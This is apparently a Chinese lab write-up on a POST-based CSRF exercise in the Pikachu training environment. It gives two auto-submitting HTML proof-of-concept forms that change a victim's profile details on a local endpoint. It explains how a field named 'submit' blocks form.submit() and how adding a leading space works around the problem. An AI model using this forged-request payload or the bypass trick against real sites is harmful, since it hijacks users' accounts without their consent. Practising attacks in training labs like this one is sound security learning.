pikachu靶场环境中,post的csrf在参数中有一个submit=submit,开始poc如下
<html>
<body>
<form action="http://127.0.0.1/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
<input type="hidden" name="sex" value="girl" />
<input type="hidden" name="phonenum" value="18656565545" />
<input type="hidden" name="add" value="usa" />
<input type="hidden" name="email" value="zhangsan@pikachu.com" />
<input type="hidden" name="submit" value="submit" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
但是自动提交表单失败,一番搜索后发现是name="submit"这里与submit()冲突了,开始想的是利用url编码,把name="submit"改成name="%73ubmit",burp中发送是可行的,但是实际测试中因为Content-Type: application/x-www-form-urlencoded,把%做了编码,%73ubmit变成了%2573ubmit,最后发现可以在submit前加空格解决,变成name=" submit",最终poc如下
<html>
<body>
<form action="http://127.0.0.1/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
<input type="hidden" name="sex" value="girl" />
<input type="hidden" name="phonenum" value="18656565545" />
<input type="hidden" name="add" value="usa" />
<input type="hidden" name="email" value="zhangsan@pikachu.com" />
<input type="hidden" name=" submit" value="submit" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
顺便说下,测试过程中发现chrome浏览器在请求的时候不会携带cookie信息了,还没搞清楚是哪条安全策略导致的,最后使用猎豹浏览器测试成功
